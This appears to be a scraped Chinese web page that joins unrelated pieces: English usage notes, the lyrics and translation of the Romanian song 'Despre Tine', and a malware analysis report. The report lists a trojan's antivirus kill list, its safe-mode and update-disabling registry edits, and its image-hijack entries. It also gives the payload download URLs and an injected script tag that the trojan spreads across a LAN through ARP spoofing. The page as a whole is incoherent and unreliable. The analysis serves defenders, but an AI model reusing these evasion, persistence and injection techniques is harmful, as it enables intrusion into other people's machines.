sometimes , sometine , some time , some times的区别

sometimes , sometine , some time , some times的区别,第1张

1 sometimes : 副词 adv 不时;有时

not very often

We sometimes visit our grandmother

我们有时去看我们的祖母。

Sometimes I wonder if he is honest

有时我怀疑他是否诚实。

2some time : 副词 adv 在未来某时, 经过若干时间

I will be back some time next week

3sometime : 副词 adv 某个时候;某日

at a time that one does not know exactly

I saw him sometime last year

我去年某个时候见到过他。

4 some times: 几次;几倍

是不定冠词a和定冠词the的区别。

This is the time of the Thai New Year翻译:这是泰国新年的时间。

This is a time for cleaning and washing away bad things翻译:这是清洗和清洗坏东西的时候了。

冠词是一种虚词。有不定冠词和定冠词两种。其中a(还有an,an放在元音开头单词的前面)不定冠词,放在单数的可数名词前面,表示泛指。the属于定冠词,表示特指。

冠词一般是用在名词前面,修饰名词所代表的人或物或事件。

用来修饰名词的还有形容词,如:beautiful、clever、lovely。

英语中还有动词(及物动词和 不及物动词),副词,介词等不同词性。

这首歌也是O-zone的,我查了罗马尼亚的歌迷论坛有这首歌的英文翻译

http://wwwfanclubro/despre-tine-english-translation-at13900html

Depsre Tine是About you的意思,翻译成中文就是“关于你”

萧饮寒

歌词如下

Depsre Tine: About you

Ma trezesc cu tine-n-gind

Despre tine vreau sa cint

Melodia mea de dor

Care place tuturor

I wake up with you in mind

I want to sing about you

My melody of longing

That everybody likes

Nu raspunzi la SMS

Eu iti scriu atit de des

Poate m-am purtat urit

Dar sa stii ca te-am iubit!

You don't answer my SMS

I write to you so often

Maybe I bahaved badly

But know that I loved you!

Ma inec in ochii tai

LA LU LA LA LEI

Plinge lumea dupa ei

LA LU LA LA LEI

Esti un inger pe pamint

I'm drowning in your eyes

Blah Blah

The world weeps for them

Blah Blah

You're an angel on the earth

Despre tine cint

Si zi si noapte

LA LA LEI

About you I sing

Day and night

Blah Blah

Ma inec in ochii tai

LA LU LA LA LEI

Plinge lumea dupa ei

LA LU LA LA LEI

Esti un inger pe pamint

I'm drowning in your eyes

Blah Blah

The world weeps for them

Blah Blah

You're an angel on the earth

Despre tine cint

Si zi si noapte

LA LA LEI

About you I sing

Day and night

Blah Blah

Daca mergi cu mine-n-vis

Am sa te invat sa rizi

Si-am sa-ti cint pina in zori

Cintecelul meu de dor

If you come with me in (my) dream

I will teach you how to laugh

And I'll sing to you until the dawn

My little song of longing

Nu raspunzi la SMS

Eu iti scriu atit de des

Poate m-am purtat urit

Dar sa stii ca te-am iubit!

You don't answer my SMS

I write to you so often

Maybe I bahaved badly

But know that I loved you

we are happy to be here我们很高兴来这里

for后面不能连接动词原形be,可以连接动名词being,表示事件

Be on time tomorrow词组on time,按时

Keep off the grass离玻璃远点儿off表示距离

以上两句均为祈使句

It's very bad to spit on the ground随地吐痰很不好

to spit on the ground动词不定式是本句的真实主语,因为太长了,所以放在句尾,而用it代表它站在主语的位置ground指地面,地表,地上,所以介词用on如果说一定要把痰吐到地里面去,要说into the earth,仍然是带着to的in,to在此表示去向,目标,目的地

最近发现很多人出现了打不开shadu软件 反病 毒工具 甚至带有病 毒字样的窗口 今天就接到了这样的一个样本 先前

这是一个可以说结合了几乎所有病 毒的特征的病毒 除了感染文件之外 可以说是比熊猫有过之而无不及!

病毒特征:

1破坏安全模式

2结束常见杀毒软件以及反病毒工具进程

3监控窗口

4关闭自动更新以及Windows安全中心

5屏蔽显示隐藏文件

6下载木马

7IFEO映像劫持

8GHOST文件引导破坏

9各盘符均有引导启动关联文件,即便你重装系统盘也照样发作

分析报告

File: 1201AEC1exe

Size: 36435 bytes

MD5: 23D80E8E5C2B7EB19E006E80C9BD4BFB

SHA1: E760703C8776C652B424FA62AF945434FB786BE5

CRC32: 27CA1195

加壳方式:UPX

病毒运行后

在C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面释放一个同样由8个数字和字母组成的组合的文

件名的dll 和一个同名的dat 文件

我这里是C:\Program Files\Common Files\Microsoft Shared\MSInfo\41115BDDdll

这个随机的数字应该与机器码有关

该dll插入Explorer进程 Timplatform以及ctfmon进程

监视并关闭以下进程以及窗口

AntiVirus

TrojanFirewall

Kaspersky

JiangMin

KV200

kxp

Rising

RAV

RFW

KAV200

KAV6

McAfe

Network Associates

TrustPort

NortonSymantec

SYMANT~1

Norton SystemWorks

ESET

Grisoft

F-Pro

Alwil Software

ALWILS~1

F-Secure

ArcaBit

Softwin

ClamWin

DrWe

Fortineanda Software

Vba3

Trend Micro

QUICKH~1

TRENDM~1

Quick Heal

eSafewido

Prevx1

ers

avg

Ikarus

SophoSunbeltPC-cilli

ZoneAlar

Agnitum

WinAntiVirus

AhnLab

Normasurfsecret

Bullguard\Blac

360safe

SkyNet

Micropoint

Iparmor

ftc

mmjk2007

Antiy Labs

LinDirMicro Lab

Filseclab

ast

System Safety Monitor

ProcessGuard

FengYun

Lavasoft

NOD3

mmsk

The Cleaner

Defendio

kis6Beheadsreng

IceSword

HijackThis

killbox

procexp

Magicset

EQSysSecureProSecurity

Yahoo!

Google

baidu

P4P

Sogou PXP

ardsys

超级兔子木马

KSysFiltsys

KSysCallsys

AVK

K7

Zondex

blcorp

Tiny Firewall Pro

Jetico

HAURI

CA

kmx

PCClear_Plus

Novatix

Ashampoo

WinPatrol

Spy Cleaner Gold

CounterSpy

EagleEyeOS

Webroot

BufferZ

avp

AgentSvr

CCenter

Rav

RavMonD

RavStub

RavTask

rfwcfg

rfwsrv

RsAgent

Rsaupd

runiep

SmartUp

FileDsty

RegClean

360tray

360Safe

360rpt

kabaload

safelive

Ras

KASMain

KASTask

KAV32

KAVDX

KAVStart

KISLnchr

KMailMon

KMFilter

KPFW32

KPFW32X

KPFWSvc

KWatch9x

KWatch

KWatchX

TrojanDetector

UpLiveEXE

KVSrvXP

KvDetect

KRegEx

kvol

kvolself

kvupload

kvwsc

UIHost

IceSword

iparmo

mmsk

adam

MagicSet

PFWLiveUpdate

SREng

WoptiClean

scan32

hcfg32

mcconsol

HijackThis

mmqczj

Trojanwall

FTCleanerShell

loaddll

rfwProxy

KsLoader

KvfwMcl

autoruns

AppSvc32

ccSvcHst

isPwdSvc

symlcsvcnod32kui

avgrssvc

RfwMain

KAVPFW

Iparmor

nod32krn

PFW

RavMon

KAVSetup

NAVSetup

SysSafe

QHSET

zxsweep

AvMonitor

UmxCfg

UmxFwHlp

UmxPol

UmxAgent

UmxAttachment

KPFW32

KPFW32X

KvXP_1

KVMonXP_1

KvReport

KVScan

KVStub

KvXP

KVMonXP

KVCenter

TrojDie

avpcom

krepairCOM

KaScrScnSCR

Trojan

Virus

kaspersky

jiangmin

rising

ikaka

duba

kingsoft

360safe

木马

木马

病毒

shadu

shadu

查 毒

防 毒

反 病 毒

专杀

专杀

卡 巴 斯 基

江 民

瑞 星

卡卡社区

金 山 毒 霸

毒霸

金 山 社 区

3 6 0 安全

恶 意 软 件

流 氓 软 件

举 报

报 警

杀 软

杀 软

防 骇

在C:\WINDOWS\Help\下面生成一个同样由8个数字和字母组成的组合的文件名的chm文件

在C:\WINDOWS\下面生成一个同样由8个数字和字母组成的组合的文件名的hlp文件

删除C:\WINDOWS\system32\verclsidexe

将其重命名为verclsidexebak

释放41115BDDexe(随机8位)和autoruninf到除系统分区外的其他分区

注册表相关操作

删除

HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}

破坏安全模式

修改

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue值

为0x00000000

HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden为0x00000002

HKU\S-1-5-21-1085031214-1078145449-839522115-500

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden为0x00000001

屏蔽显示隐藏文件

修改常见杀毒软件服务的start键值为0x00000004

如HKLM\SYSTEM\ControlSet001\Services\RfwService\Start: 0x00000004

修改HKLM\SYSTEM\CurrentControlSet\Services\wuauserv\Start

和HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\start键值为0x00000004

关闭自动更新

添加IFEO映像劫持项( 我的意见是用Autoruns删除映像劫持)

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rptexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360Safeexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360trayexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\adamexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AgentSvrexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppSvc32exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorunsexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrssvcexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AvMonitorexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpcom

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CCenterexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHstexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FileDstyexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\FTCleanerShellexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThisexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\IceSwordexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iparmoexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Iparmorexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\isPwdSvcexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kabaloadexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KaScrScnSCR

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASMainexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KASTaskexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAV32exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVDXexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVPFWexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVSetupexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KAVStartexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KISLnchrexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMailMonexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KMFilterexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFW32Xexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KPFWSvcexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KRegExexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\krepairCOM

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KsLoaderexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVCenterkxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvDetectexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvfwMclexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXPkxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVMonXP_1kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvolselfexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvReportkxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVScankxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVSrvXPexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KVStubkxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvuploadexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kvwscexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXPkxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KvXP_1kxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatch9xexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\KWatchXexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\loaddllexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MagicSetexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcconsolexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmqczjexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mmskexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NAVSetupexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32krnexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nod32kuiexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PFWLiveUpdateexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\QHSETexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rasexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Ravexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavMonDexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavStubexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RavTaskexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegCleanexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwcfgexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RfwMainexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwProxyexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rfwsrvexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RsAgentexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Rsaupdexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\runiepexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safeliveexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shcfg32exe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SmartUpexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SREngexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\symlcsvcexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SysSafeexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojanDetectorexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Trojanwallexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TrojDiekxp

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UIHostexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAgentexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxAttachmentexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxCfgexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxFwHlpexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UmxPolexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UpLiveEXEexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WoptiCleanexe

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zxsweepexe

被劫持到C:\Program Files\Common Files\Microsoft Shared\MSInfo\下面的那个dat文件

下载dl1exe到临时文件夹

首先下载http://googlexxxx38org/update/downtxt看病毒是否需要更新

然后分别下载http://googlexxxx38org/update/wowexe

http://googlexxxx38org/update/mhexe

http://googlexxxx38org/update/wmexe

http://googlexxxx38org/update/myexe

http://googlexxxx38org/update/wlexe

http://googlexxxx38org/update/ztexe

http://googlexxxx38org/update/jhexe

http://googlexxxx38org/update/tlexe

http://googlexxxx38org/update/1exe

http://googlexxxx38org/update/2exe 到program files 文件夹 并把他们命名为ycnt1exe~ycnt10exe

具体每个文件的生成物就不一一列举了

不过值得一提的是ycnt9exe这个木马

他生成C:\WINDOWS\system32\win1ogoexe

并且该木马试图向局域网内所有用户的80端口每隔5000ms进行arp欺骗

插入<script language=javascript src=http://google171738org/ad2js></script>代码

也就是局域网内所有用户在打开网页时都会被插入这段代码

欢迎分享,转载请注明来源:品搜搜测评网

原文地址:https://pinsoso.cn/meirong/1650309.html

(0)
打赏 微信扫一扫微信扫一扫 支付宝扫一扫支付宝扫一扫
上一篇 2023-10-08
下一篇2023-10-08

随机推荐

发表评论

登录后才能评论
保存